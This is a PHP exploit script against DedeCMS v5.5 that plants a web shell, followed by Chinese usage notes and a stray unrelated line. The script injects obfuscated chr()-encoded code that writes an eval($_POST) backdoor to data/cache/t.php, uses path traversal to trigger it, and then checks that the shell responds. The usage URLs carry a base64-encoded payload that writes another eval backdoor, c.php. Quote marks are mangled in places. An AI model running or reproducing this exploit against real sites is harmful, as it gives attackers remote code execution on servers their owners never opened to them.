<?phpprint_r(+—————————————-+dedecms v5.5 final getwebshell exploit+—————————————-+);if ($argc < 3) {print_r(+—————————————-+Usage: php .$argv[0]. host pathhost: target server (ip/hostname)path: path to dedecmsExample:php .$argv[0]. localhost /dedecms/+—————————————-+ );exit;}error_reporting(7);ini_set(max_execution_time, 0);
$host = $argv[1];$path = $argv[2];
$post_a = plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*;$post_b = needCode=aa/../../../data/mysql_error_trace;$shell = data/cache/t.php;
get_send($post_a);post_send(plus/comments_frame.php,$post_b);$content = post_send($shell,t=echo tojen;);
if(substr($content,9,3)==200){ echo “Shell Address is:”.$host.$path.$shell;}else{ echo “Error.”;}function get_send($url){ global $host, $path; $message = “GET “.$path.”$url HTTP/1.1”; $message .= “Accept: */*”; $message .= “Referer: http://$host$path”; $message .= “Accept-Language: zh-cn”; $message .= “Content-Type: application/x-www-form-urlencoded”; $message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)”; $message .= “Host: $host”; $message .= “Connection: Close”; $fp = fsockopen($host, 80); if(!$fp){ echo “Connect to host Error”; } fputs($fp, $message); $back = ;
while (!feof($fp)) $back .= fread($fp, 1024); fclose($fp); return $back; }function post_send($url,$cmd){ global $host, $path; $message = “POST “.$path.”$url HTTP/1.1”; $message .= “Accept: */*”; $message .= “Referer: http://$host$path”; $message .= “Accept-Language: zh-cn”; $message .= “Content-Type: application/x-www-form-urlencoded”; $message .= “User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)”; $message .= “Host: $host”; $message .= “Content-Length: “.strlen($cmd).””; $message .= “Connection: Close”; $message .= $cmd; $fp = fsockopen($host, 80); if(!$fp){ echo “Connect to host Error”; } fputs($fp, $message); $back = ;
while (!feof($fp)) $back .= fread($fp, 1024); fclose($fp); return $back;}?>
利用方法复制代码http://xxx.com//uploads/plus/digg_frame.php?action=good&id=1024%651024&mid=*/fputs(fopen(base64_decode(ZGF0YS9jYWNoZS9jLnBocA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4));?>
复制代码http://xxx.com/uploads/plus/comments_frame.php?id=2&needCode=/../../../data/mysql_error_trace
在data/cache下生成c.php
一个人的天地是冷得连呼吸都会寂寞的颤栗,而麻烦,